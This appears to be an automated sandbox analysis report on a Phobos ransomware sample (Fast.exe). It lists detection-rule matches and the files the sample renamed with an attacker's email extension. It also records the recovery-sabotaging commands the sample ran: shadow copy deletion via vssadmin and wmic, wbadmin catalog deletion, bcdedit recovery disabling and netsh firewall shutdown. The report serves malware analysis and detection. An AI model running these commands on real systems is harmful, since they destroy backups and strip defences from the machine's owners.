Source: 2.0.Fast.exe.ca0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Phobos_11ea7be5 os = windows, severity = x86, description = Identifies Phobos ransomware, creation_date = 2020-06-25, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos, license = Elastic License v2, threat_name = Windows.Ransomware.Phobos, fingerprint = a264f93e085134e5114c5d72e1bf93e70935e33756a79f1021e9c1e71d6c8697, id = 11ea7be5-7aac-41d7-8d09-45131a9c656e, last_modified = 2021-08-23
Source: 2.0.Fast.exe.ca0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Phobos author = ditekshen, description = Detects Phobos ransomware
Source: 17.0.Fast.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Phobos_11ea7be5 os = windows, severity = x86, description = Identifies Phobos ransomware, creation_date = 2020-06-25, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos, license = Elastic License v2, threat_name = Windows.Ransomware.Phobos, fingerprint = a264f93e085134e5114c5d72e1bf93e70935e33756a79f1021e9c1e71d6c8697, id = 11ea7be5-7aac-41d7-8d09-45131a9c656e, last_modified = 2021-08-23
Source: 17.0.Fast.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Phobos author = ditekshen, description = Detects Phobos ransomware
Source: 25.0.Fast.exe.200000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Phobos_11ea7be5 os = windows, severity = x86, description = Identifies Phobos ransomware, creation_date = 2020-06-25, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos, license = Elastic License v2, threat_name = Windows.Ransomware.Phobos, fingerprint = a264f93e085134e5114c5d72e1bf93e70935e33756a79f1021e9c1e71d6c8697, id = 11ea7be5-7aac-41d7-8d09-45131a9c656e, last_modified = 2021-08-23
Source: 25.0.Fast.exe.200000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Phobos author = ditekshen, description = Detects Phobos ransomware
Source: 2.2.Fast.exe.ca0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Phobos_11ea7be5 os = windows, severity = x86, description = Identifies Phobos ransomware, creation_date = 2020-06-25, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos, license = Elastic License v2, threat_name = Windows.Ransomware.Phobos, fingerprint = a264f93e085134e5114c5d72e1bf93e70935e33756a79f1021e9c1e71d6c8697, id = 11ea7be5-7aac-41d7-8d09-45131a9c656e, last_modified = 2021-08-23
Source: 2.2.Fast.exe.ca0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Phobos author = ditekshen, description = Detects Phobos ransomware
Source: 0.0.Fast.exe.ca0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Phobos_11ea7be5 os = windows, severity = x86, description = Identifies Phobos ransomware, creation_date = 2020-06-25, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos, license = Elastic License v2, threat_name = Windows.Ransomware.Phobos, fingerprint = a264f93e085134e5114c5d72e1bf93e70935e33756a79f1021e9c1e71d6c8697, id = 11ea7be5-7aac-41d7-8d09-45131a9c656e, last_modified = 2021-08-23
Source: 0.0.Fast.exe.ca0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Phobos author = ditekshen, description = Detects Phobos ransomware
Source: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Phobos_11ea7be5 os = windows, severity = x86, description = Identifies Phobos ransomware, creation_date = 2020-06-25, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos, license = Elastic License v2, threat_name = Windows.Ransomware.Phobos, fingerprint = a264f93e085134e5114c5d72e1bf93e70935e33756a79f1021e9c1e71d6c8697, id = 11ea7be5-7aac-41d7-8d09-45131a9c656e, last_modified = 2021-08-23
Source: 00000013.00000002.2135391960.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Phobos_11ea7be5 os = windows, severity = x86, description = Identifies Phobos ransomware, creation_date = 2020-06-25, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos, license = Elastic License v2, threat_name = Windows.Ransomware.Phobos, fingerprint = a264f93e085134e5114c5d72e1bf93e70935e33756a79f1021e9c1e71d6c8697, id = 11ea7be5-7aac-41d7-8d09-45131a9c656e, last_modified = 2021-08-23
Source: 00000013.00000000.2125457686.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Phobos_11ea7be5 os = windows, severity = x86, description = Identifies Phobos ransomware, creation_date = 2020-06-25, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos, license = Elastic License v2, threat_name = Windows.Ransomware.Phobos, fingerprint = a264f93e085134e5114c5d72e1bf93e70935e33756a79f1021e9c1e71d6c8697, id = 11ea7be5-7aac-41d7-8d09-45131a9c656e, last_modified = 2021-08-23
Source: 00000000.00000000.1776137882.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Phobos_11ea7be5 os = windows, severity = x86, description = Identifies Phobos ransomware, creation_date = 2020-06-25, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos, license = Elastic License v2, threat_name = Windows.Ransomware.Phobos, fingerprint = a264f93e085134e5114c5d72e1bf93e70935e33756a79f1021e9c1e71d6c8697, id = 11ea7be5-7aac-41d7-8d09-45131a9c656e, last_modified = 2021-08-23
Source: 0000000E.00000000.1940315719.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Phobos_11ea7be5 os = windows, severity = x86, description = Identifies Phobos ransomware, creation_date = 2020-06-25, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos, license = Elastic License v2, threat_name = Windows.Ransomware.Phobos, fingerprint = a264f93e085134e5114c5d72e1bf93e70935e33756a79f1021e9c1e71d6c8697, id = 11ea7be5-7aac-41d7-8d09-45131a9c656e, last_modified = 2021-08-23
Source: 00000011.00000000.2019602481.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Phobos_11ea7be5 os = windows, severity = x86, description = Identifies Phobos ransomware, creation_date = 2020-06-25, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos, license = Elastic License v2, threat_name = Windows.Ransomware.Phobos, fingerprint = a264f93e085134e5114c5d72e1bf93e70935e33756a79f1021e9c1e71d6c8697, id = 11ea7be5-7aac-41d7-8d09-45131a9c656e, last_modified = 2021-08-23
Source: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Phobos_11ea7be5 os = windows, severity = x86, description = Identifies Phobos ransomware, creation_date = 2020-06-25, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos, license = Elastic License v2, threat_name = Windows.Ransomware.Phobos, fingerprint = a264f93e085134e5114c5d72e1bf93e70935e33756a79f1021e9c1e71d6c8697, id = 11ea7be5-7aac-41d7-8d09-45131a9c656e, last_modified = 2021-08-23
Source: 00000002.00000003.1779252416.0000000000DAD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Phobos_11ea7be5 os = windows, severity = x86, description = Identifies Phobos ransomware, creation_date = 2020-06-25, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos, license = Elastic License v2, threat_name = Windows.Ransomware.Phobos, fingerprint = a264f93e085134e5114c5d72e1bf93e70935e33756a79f1021e9c1e71d6c8697, id = 11ea7be5-7aac-41d7-8d09-45131a9c656e, last_modified = 2021-08-23
Source: 00000019.00000000.2225352024.0000000000201000.00000020.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Phobos_11ea7be5 os = windows, severity = x86, description = Identifies Phobos ransomware, creation_date = 2020-06-25, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos, license = Elastic License v2, threat_name = Windows.Ransomware.Phobos, fingerprint = a264f93e085134e5114c5d72e1bf93e70935e33756a79f1021e9c1e71d6c8697, id = 11ea7be5-7aac-41d7-8d09-45131a9c656e, last_modified = 2021-08-23
Source: 0000000E.00000002.1949813371.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Phobos_11ea7be5 os = windows, severity = x86, description = Identifies Phobos ransomware, creation_date = 2020-06-25, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos, license = Elastic License v2, threat_name = Windows.Ransomware.Phobos, fingerprint = a264f93e085134e5114c5d72e1bf93e70935e33756a79f1021e9c1e71d6c8697, id = 11ea7be5-7aac-41d7-8d09-45131a9c656e, last_modified = 2021-08-23
Source: 00000011.00000002.2024695997.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Phobos_11ea7be5 os = windows, severity = x86, description = Identifies Phobos ransomware, creation_date = 2020-06-25, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos, license = Elastic License v2, threat_name = Windows.Ransomware.Phobos, fingerprint = a264f93e085134e5114c5d72e1bf93e70935e33756a79f1021e9c1e71d6c8697, id = 11ea7be5-7aac-41d7-8d09-45131a9c656e, last_modified = 2021-08-23
Source: 00000002.00000000.1778560416.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Phobos_11ea7be5 os = windows, severity = x86, description = Identifies Phobos ransomware, creation_date = 2020-06-25, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos, license = Elastic License v2, threat_name = Windows.Ransomware.Phobos, fingerprint = a264f93e085134e5114c5d72e1bf93e70935e33756a79f1021e9c1e71d6c8697, id = 11ea7be5-7aac-41d7-8d09-45131a9c656e, last_modified = 2021-08-23
Source: vk_swiftshader.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight.0.drBinary string: ..\..\third_party\swiftshader\src\Device\Sampler.hpp
Source: vk_swiftshader.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight.0.drBinary string: ..\..\third_party\swiftshader\src\Device\Blitter.cpp
Source: vk_swiftshader.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight.0.drBinary string: ..\..\third_party\swiftshader\src\Device\Context.cpp%s:%d WARNING: UNSUPPORTED: VkIndexType %d
Source: vk_swiftshader.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight.0.drBinary string: ..\..\third_party\swiftshader\src\Device\Context.cpp
Source: vk_swiftshader.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight.0.drBinary string: ..\..\third_party\swiftshader\src\Device\Sampler.hpp%s:%d WARNING: UNSUPPORTED: VkImageViewType %d
Source: vk_swiftshader.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight.0.drBinary string: ..\..\third_party\swiftshader\src\Device\Blitter.cpp%s:%d WARNING: UNSUPPORTED: Blitter source format %d
Source: vk_swiftshader.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight.0.drBinary string: =..\..\third_party\swiftshader\src\Device\Renderer.cpp%s:%d WARNING: UNSUPPORTED: polygon mode: %d
Source: vk_swiftshader.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight.0.drBinary string: =..\..\third_party\swiftshader\src\Device\Renderer.cpp
Source: classification engineClassification label: mal100.rans.spre.adwa.evad.winEXE@29/162@0/0
Source: C:\Users\user\Desktop\Fast.exeCode function: 2_2_00CA3DC0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,FindCloseChangeNotification,2_2_00CA3DC0
Source: C:\Users\user\AppData\Local\Fast.exeCode function: 14_2_000D3DC0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,14_2_000D3DC0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fast.exeCode function: 25_2_00203DC0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,25_2_00203DC0
Source: C:\Users\user\Desktop\Fast.exeCode function: 2_2_00CA4DEE CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,OpenProcess,TerminateProcess,CloseHandle,Process32NextW,FindCloseChangeNotification,2_2_00CA4DEE
Source: C:\Users\user\Desktop\Fast.exeFile created: C:\Program Files\7-Zip\7-zip.chm.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeFile created: C:\Users\user\AppData\Local\Fast.exe\:Zone.Identifier:$DATAJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7772:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7780:120:WilError_03
Source: C:\Users\user\Desktop\Fast.exeMutant created: \Sessions\1\BaseNamedObjects\Global\<<BID>>9AA40F1700000001
Source: C:\Users\user\Desktop\Fast.exeMutant created: \Sessions\1\BaseNamedObjects\Global\<<BID>>9AA40F1700000000
Source: Fast.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Fast.exeFile read: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1001\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\Fast.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: Fast.exeReversingLabs: Detection: 89%
Source: C:\Users\user\Desktop\Fast.exeFile read: C:\Users\user\Desktop\Fast.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\Fast.exe C:\Users\user\Desktop\Fast.exe
Source: C:\Users\user\Desktop\Fast.exeProcess created: C:\Users\user\Desktop\Fast.exe C:\Users\user\Desktop\Fast.exe
Source: C:\Users\user\Desktop\Fast.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
Source: C:\Users\user\Desktop\Fast.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall set currentprofile state off
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall set opmode mode=disable
Source: unknownProcess created: C:\Users\user\AppData\Local\Fast.exe "C:\Users\user\AppData\Local\Fast.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy delete
Source: unknownProcess created: C:\Users\user\AppData\Local\Fast.exe "C:\Users\user\AppData\Local\Fast.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures
Source: unknownProcess created: C:\Users\user\AppData\Local\Fast.exe "C:\Users\user\AppData\Local\Fast.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbadmin.exe wbadmin delete catalog -quiet
Source: unknownProcess created: C:\Windows\System32\wbengine.exe C:\Windows\system32\wbengine.exe
Source: unknownProcess created: C:\Windows\System32\vdsldr.exe C:\Windows\System32\vdsldr.exe -Embedding
Source: unknownProcess created: C:\Windows\System32\vds.exe C:\Windows\System32\vds.exe
Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fast.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fast.exe"
Source: C:\Users\user\Desktop\Fast.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exeJump to behavior
Source: C:\Users\user\Desktop\Fast.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quietJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy deleteJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailuresJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled noJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbadmin.exe wbadmin delete catalog -quietJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall set currentprofile state off
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall set opmode mode=disable
Source: C:\Windows\System32\vssadmin.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F2C2787D-95AB-40D4-942D-298F5F757874}\InProcServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\7-zip.chm.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\7-zip.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\7-zip32.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\7z.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\7z.sfx.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\7zCon.sfx.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\7zFM.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\7zG.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\descript.ion.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\History.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\af.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\an.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\ar.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\ast.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\az.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\ba.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\be.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\bg.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\bn.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\br.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\ca.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\co.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\cs.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\cy.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\de.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\da.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\el.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\en.ttt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\eo.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\es.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\et.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\eu.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\ext.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\fa.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\fi.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\fr.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\fur.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\fy.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\ga.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\gl.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\gu.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\he.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\hi.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\hr.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\hu.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\hy.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\id.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\io.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\is.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\it.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\ja.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\ka.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\kab.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\kaa.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\kk.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\ko.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\ku-ckb.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\ku.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\ky.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\lij.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\lt.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\lv.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\mk.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\mn.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\mng.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\mng2.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
